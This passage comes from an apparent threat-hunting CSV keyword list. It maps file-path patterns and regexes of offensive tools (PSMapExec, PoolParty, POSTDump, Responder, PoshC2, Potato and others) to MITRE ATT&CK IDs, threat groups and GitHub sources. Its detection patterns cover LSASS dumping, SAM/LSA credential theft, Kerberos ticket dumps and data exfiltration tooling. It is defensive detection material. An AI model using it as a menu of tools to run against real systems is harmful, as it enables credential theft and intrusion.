T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","17293" "*\PME\*-ConsoleHistory.txt*",".{0,1000}\\PME\\.{0,1000}\-ConsoleHistory\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17294" "*\PME\Console History\*",".{0,1000}\\PME\\Console\sHistory\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17295" "*\PME\eKeys\*",".{0,1000}\\PME\\eKeys\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17296" "*\PME\LogonPasswords*",".{0,1000}\\PME\\LogonPasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17297" "*\PME\LSA\*",".{0,1000}\\PME\\LSA\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17298" "*\PME\MSSQL\*",".{0,1000}\\PME\\MSSQL\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17299" "*\PME\SAM\*",".{0,1000}\\PME\\SAM\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17300" "*\PME\Sessions\*",".{0,1000}\\PME\\Sessions\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17301" "*\PME\SMB\*",".{0,1000}\\PME\\SMB\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17302" "*\PME\Spraying\*",".{0,1000}\\PME\\Spraying\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17303" "*\PME\Tickets\Kerbdump*",".{0,1000}\\PME\\Tickets\\Kerbdump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17304" "*\PME\Tickets\MimiTickets*",".{0,1000}\\PME\\Tickets\\MimiTickets.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17305" "*\PME\User Files\*",".{0,1000}\\PME\\User\sFiles\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17306" "*\PME\VNC\*",".{0,1000}\\PME\\VNC\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17307" "*\pngZIP.ps1*",".{0,1000}\\pngZIP\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","17308" "*\PoC\PrivilegeEscalation*",".{0,1000}\\PoC\\PrivilegeEscalation.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","17309" "*\POC_DLL.dll*",".{0,1000}POC_DLL\.dll.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","17310" "*\POC_DLL.vcxproj*",".{0,1000}\\POC_DLL\.vcxproj.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","17311" "*\Pocket RAT - Client.exe*",".{0,1000}\\Pocket\sRAT\s\-\sClient\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17312" "*\Poisoners-Session.log*",".{0,1000}\\Poisoners\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","17313" "*\PoisonTendy\Invokes\*",".{0,1000}\\PoisonTendy\\Invokes\\.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","17314" "*\polenum.py*",".{0,1000}\\polenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","17315" "*\PoolParty.cpp*",".{0,1000}\\PoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread 
Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17316" "*\PoolParty.exe*",".{0,1000}\\PoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17317" "*\PoolParty.hpp*",".{0,1000}\\PoolParty\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17318" "*\PoolParty.sln*",".{0,1000}\\PoolParty\.sln.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17319" "*\PoolParty.vcxproj*",".{0,1000}\\PoolParty\.vcxproj.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17320" "*\PoolParty-PoolParty\*",".{0,1000}\\PoolParty\-PoolParty\\.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense 
Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17321" "*\pop_exfil_client.py*",".{0,1000}\\pop_exfil_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","17322" "*\pop_exfil_server.py*",".{0,1000}\\pop_exfil_server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","17323" "*\POP3-Clear-Text-Password-*.txt*",".{0,1000}\\POP3\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","17324" "*\port_reuse.py*",".{0,1000}\\port_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","17325" "*\port_scan.py*",".{0,1000}\\port_scan\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17326" "*\portbender.*",".{0,1000}\\portbender\..{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","17327" "*\Portscan.exe*",".{0,1000}\\Portscan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17333" "*\PortScan.exe*",".{0,1000}\\PortScan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - 
TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17334" "*\Port-Scan.ps1*",".{0,1000}\\Port\-Scan\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17335" "*\PortScanner.ahk*",".{0,1000}\\PortScanner\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","17336" "*\port-scan-tcp.ps1*",".{0,1000}\\port\-scan\-tcp\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","17337" "*\port-scan-udp.ps1*",".{0,1000}\\port\-scan\-udp\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - 
TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","17338" "*\PoshADCS-master*",".{0,1000}\\PoshADCS\-master.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","17339" "*\PoshC2*",".{0,1000}\\PoshC2.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","17340" "*\Poshito.dll*",".{0,1000}\\Poshito\.dll.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","17341" "*\Poshito.exe*",".{0,1000}\\Poshito\.exe.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","17342" "*\POSTDump.csproj*",".{0,1000}\\POSTDump\.csproj.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","17343" "*\PostDump.exe*",".{0,1000}\\PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","17344" "*\POSTDump.sln*",".{0,1000}\\POSTDump\.sln.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","17345" "*\POSTDump\POSTDump\*",".{0,1000}\\POSTDump\\POSTDump\\.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","17346" "*\PostExploitation.psm1*",".{0,1000}\\PostExploitation\.psm1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - 
T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17347" "*\POSTMiniDump\*",".{0,1000}\\POSTMiniDump\\.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","17348" "*\Potato.exe*",".{0,1000}\\Potato\.exe.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068 - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","N/A","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","17349" "*\Potato\obj\Release\Potato.pdb*",".{0,1000}\\Potato\\obj\\Release\\Potato\.pdb.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068 - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#content","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","17350" "*\PotatoTrigger.cpp*",".{0,1000}PotatoTrigger\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","17351" "*\PotentiallyCrackableAccounts.ps1*",".{0,1000}\\PotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17352" "*\PowerBreach.ps1*",".{0,1000}\\PowerBreach\.ps1.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17353" "*\PowerBruteLogon*",".{0,1000}\\PowerBruteLogon.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","0","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","17354" "*\powercat.ps1",".{0,1000}\\powercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 
